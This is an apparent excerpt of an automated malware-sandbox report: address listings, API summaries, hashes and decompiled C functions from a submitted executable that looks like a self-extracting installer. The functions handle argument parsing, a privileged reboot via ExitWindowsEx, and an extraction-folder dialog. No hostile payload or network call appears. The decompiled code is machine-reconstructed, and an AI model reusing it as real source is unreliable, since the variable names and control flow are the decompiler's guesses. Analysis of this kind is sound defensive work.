                                                                                                                                                                                                        0x00de6019
                                                                                                                                                                                                        0x00de601b
                                                                                                                                                                                                        0x00de6033
                                                                                                                                                                                                        0x00de601d
                                                                                                                                                                                                        0x00de6020
                                                                                                                                                                                                        0x00de6029
                                                                                                                                                                                                        0x00de6022
                                                                                                                                                                                                        0x00de6022
                                                                                                                                                                                                        0x00de6022
                                                                                                                                                                                                        0x00de6020
                                                                                                                                                                                                        0x00de601b
                                                                                                                                                                                                        0x00de6042
                                                                                                                                                                                                        0x00de6044
                                                                                                                                                                                                        0x00de6046
                                                                                                                                                                                                        0x00de604a
                                                                                                                                                                                                        0x00de5ff7
                                                                                                                                                                                                        0x00de5fd5
                                                                                                                                                                                                        0x00de5fd8
                                                                                                                                                                                                        0x00de5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e6b
                                                                                                                                                                                                        0x00de5e6b
                                                                                                                                                                                                        0x00de5e6e
                                                                                                                                                                                                        0x00de5f8b
                                                                                                                                                                                                        0x00de5f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5f9f
                                                                                                                                                                                                        0x00de5fa7
                                                                                                                                                                                                        0x00de5faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5fb1
                                                                                                                                                                                                        0x00de5fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5fb5
                                                                                                                                                                                                        0x00de5fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5fb9
                                                                                                                                                                                                        0x00de5fb7
                                                                                                                                                                                                        0x00de5fb3
                                                                                                                                                                                                        0x00de5faf
                                                                                                                                                                                                        0x00de5f8d
                                                                                                                                                                                                        0x00de5f8d
                                                                                                                                                                                                        0x00de5f8d
                                                                                                                                                                                                        0x00de5f8f
                                                                                                                                                                                                        0x00de5fc1
                                                                                                                                                                                                        0x00de5fc1
                                                                                                                                                                                                        0x00de5fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e74
                                                                                                                                                                                                        0x00de5e74
                                                                                                                                                                                                        0x00de5e77
                                                                                                                                                                                                        0x00de5ea0
                                                                                                                                                                                                        0x00de5ebd
                                                                                                                                                                                                        0x00de5f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5f7f
                                                                                                                                                                                                        0x00de5ec3
                                                                                                                                                                                                        0x00de5ec3
                                                                                                                                                                                                        0x00de5ecc
                                                                                                                                                                                                        0x00de5ed4
                                                                                                                                                                                                        0x00de5ed6
                                                                                                                                                                                                        0x00de5edc
                                                                                                                                                                                                        0x00de5edf
                                                                                                                                                                                                        0x00de5eea
                                                                                                                                                                                                        0x00de5eed
                                                                                                                                                                                                        0x00de5f3f
                                                                                                                                                                                                        0x00de5f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5eef
                                                                                                                                                                                                        0x00de5eef
                                                                                                                                                                                                        0x00de5ef2
                                                                                                                                                                                                        0x00de5f34
                                                                                                                                                                                                        0x00de5ef4
                                                                                                                                                                                                        0x00de5ef4
                                                                                                                                                                                                        0x00de5ef7
                                                                                                                                                                                                        0x00de5f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5ef9
                                                                                                                                                                                                        0x00de5ef9
                                                                                                                                                                                                        0x00de5efc
                                                                                                                                                                                                        0x00de5f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5efe
                                                                                                                                                                                                        0x00de5eff
                                                                                                                                                                                                        0x00de5f02
                                                                                                                                                                                                        0x00de5f16
                                                                                                                                                                                                        0x00de5f04
                                                                                                                                                                                                        0x00de5f07
                                                                                                                                                                                                        0x00de5f0d
                                                                                                                                                                                                        0x00de5f46
                                                                                                                                                                                                        0x00de5f46
                                                                                                                                                                                                        0x00de5f09
                                                                                                                                                                                                        0x00de5f09
                                                                                                                                                                                                        0x00de5f09
                                                                                                                                                                                                        0x00de5f07
                                                                                                                                                                                                        0x00de5f02
                                                                                                                                                                                                        0x00de5efc
                                                                                                                                                                                                        0x00de5ef7
                                                                                                                                                                                                        0x00de5ef2
                                                                                                                                                                                                        0x00de5f4c
                                                                                                                                                                                                        0x00de5f4e
                                                                                                                                                                                                        0x00de5f50
                                                                                                                                                                                                        0x00de5f54
                                                                                                                                                                                                        0x00de5ed4
                                                                                                                                                                                                        0x00de5ea2
                                                                                                                                                                                                        0x00de5ea4
                                                                                                                                                                                                        0x00de5eaf
                                                                                                                                                                                                        0x00de5eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e79
                                                                                                                                                                                                        0x00de5e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e83
                                                                                                                                                                                                        0x00de5e83
                                                                                                                                                                                                        0x00de5e83
                                                                                                                                                                                                        0x00de5e85
                                                                                                                                                                                                        0x00de5e85
                                                                                                                                                                                                        0x00de5e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e94
                                                                                                                                                                                                        0x00de5e8e
                                                                                                                                                                                                        0x00de5e7d
                                                                                                                                                                                                        0x00de5e77
                                                                                                                                                                                                        0x00de5e6e
                                                                                                                                                                                                        0x00de5e65
                                                                                                                                                                                                        0x00de5e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5dd0
                                                                                                                                                                                                        0x00de5dd0
                                                                                                                                                                                                        0x00de5dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5dd0
                                                                                                                                                                                                        0x00de5dce
                                                                                                                                                                                                        0x00de5dca
                                                                                                                                                                                                        0x00de5dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5d00
                                                                                                                                                                                                        0x00de5dd9
                                                                                                                                                                                                        0x00de5e04
                                                                                                                                                                                                        0x00de61fe
                                                                                                                                                                                                        0x00de5e0a
                                                                                                                                                                                                        0x00de5e0c
                                                                                                                                                                                                        0x00de5e17
                                                                                                                                                                                                        0x00de5e17
                                                                                                                                                                                                        0x00de5e04
                                                                                                                                                                                                        0x00de6200
                                                                                                                                                                                                        0x00de6200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00DE5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00DE8B3E,00000104,00000000,?,?), ref: 00DE5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00DE5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00DE5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00DE5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00DE5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00DE6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00DE60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00DE1140,00000000,00000040,00000000), ref: 00DE61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00DE61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 2cf47147b6e0b25073d082a287b5d886e817d854ac07ff8d79934dd4b66e1c6e
                                                                                                                                                                                                        • Instruction ID: e50d730f4bdf77168a42af0e96887211bd62f73555bee0638abab48ed3c8ef5f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cf47147b6e0b25073d082a287b5d886e817d854ac07ff8d79934dd4b66e1c6e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35D13B71A04BD45ADF35BB3BAC483B977619B253C8F1C01E9D4D6D6299DA70CE828B30
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00DE1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xde9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00DE44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00DE6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00DE44B9(0, 0x522, 0xde1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00DE1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00de1f90
                                                                                                                                                                                                        0x00de1f90
                                                                                                                                                                                                        0x00de1f93
                                                                                                                                                                                                        0x00de1f98
                                                                                                                                                                                                        0x00de1fa4
                                                                                                                                                                                                        0x00de1fa7
                                                                                                                                                                                                        0x00de1fc5
                                                                                                                                                                                                        0x00de1fcd
                                                                                                                                                                                                        0x00de1fdb
                                                                                                                                                                                                        0x00de1ee5
                                                                                                                                                                                                        0x00de1eea
                                                                                                                                                                                                        0x00de1ef1
                                                                                                                                                                                                        0x00de1ef4
                                                                                                                                                                                                        0x00de1f0c
                                                                                                                                                                                                        0x00de1f2e
                                                                                                                                                                                                        0x00de1f3a
                                                                                                                                                                                                        0x00de1f46
                                                                                                                                                                                                        0x00de1f4d
                                                                                                                                                                                                        0x00de1f58
                                                                                                                                                                                                        0x00de1f60
                                                                                                                                                                                                        0x00de1f61
                                                                                                                                                                                                        0x00de1f62
                                                                                                                                                                                                        0x00de1f75
                                                                                                                                                                                                        0x00de1f80
                                                                                                                                                                                                        0x00de1f77
                                                                                                                                                                                                        0x00de1f77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1f77
                                                                                                                                                                                                        0x00de1f64
                                                                                                                                                                                                        0x00de1f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1f64
                                                                                                                                                                                                        0x00de1f0e
                                                                                                                                                                                                        0x00de1f0e
                                                                                                                                                                                                        0x00de1f13
                                                                                                                                                                                                        0x00de1f13
                                                                                                                                                                                                        0x00de1f14
                                                                                                                                                                                                        0x00de1f14
                                                                                                                                                                                                        0x00de1f16
                                                                                                                                                                                                        0x00de1f17
                                                                                                                                                                                                        0x00de1f1a
                                                                                                                                                                                                        0x00de1f1f
                                                                                                                                                                                                        0x00de1f1f
                                                                                                                                                                                                        0x00de1f86
                                                                                                                                                                                                        0x00de1f8f
                                                                                                                                                                                                        0x00de1fcf
                                                                                                                                                                                                        0x00de1fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fd3
                                                                                                                                                                                                        0x00de1fa9
                                                                                                                                                                                                        0x00de1fb4
                                                                                                                                                                                                        0x00de1fbb
                                                                                                                                                                                                        0x00de1fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fc3
                                                                                                                                                                                                        0x00de1f9a
                                                                                                                                                                                                        0x00de1f9a
                                                                                                                                                                                                        0x00de1fa2
                                                                                                                                                                                                        0x00de1fd9
                                                                                                                                                                                                        0x00de1fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00DE1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00DE1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00DE1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: ccf96675e4d486cd27ae4fcc85235b22a3d246c14c7e0ef05e52a51503a2f6c3
                                                                                                                                                                                                        • Instruction ID: 0fccf3d7b890bcb0dc49a029f66eab92ecabcc7d83a0c9344fd3bfcc5209e949
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccf96675e4d486cd27ae4fcc85235b22a3d246c14c7e0ef05e52a51503a2f6c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D21E7B6B403856BDB207BA69C4AFBF77B8EF85B11F140018FA06DA185DB74D80192B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00de6cf7
                                                                                                                                                                                                        0x00de6d00
                                                                                                                                                                                                        0x00de6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DE6E26,00DE1000), ref: 00DE6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00DE6E26,?,00DE6E26,00DE1000), ref: 00DE6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00DE6E26,00DE1000), ref: 00DE6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00DE6E26,00DE1000), ref: 00DE6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: f0f3570790a1a2aff11c3325e067481950af92780bcca7c4b997be0fb427b34e
                                                                                                                                                                                                        • Instruction ID: 871c93c5d9f1906eec9bc32cc86af41ce3f12af9552790f4276e53ebaebc153c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0f3570790a1a2aff11c3325e067481950af92780bcca7c4b997be0fb427b34e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D0C932000389BBDB003BE9EC4CA593F28EB49212F454004F31DCA220CA3264518B72
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00DE3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00DE43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xde9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xde91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00DE44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xde91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xde91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xde91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xde91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00DE658A(0xde91e4, 0x104, 0xde1140);
                                                                                                                                                                                                        								_t27 = E00DE58C8(0xde91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xde91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xde91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00DE597D(0xde91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xde91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xde91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00DE44B9(_t64, 0x54a, 0xde91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xde91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xde91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xde91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xde91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xde9a3c, 0x3e8, 0xde8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00DE4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xde87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00DE44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
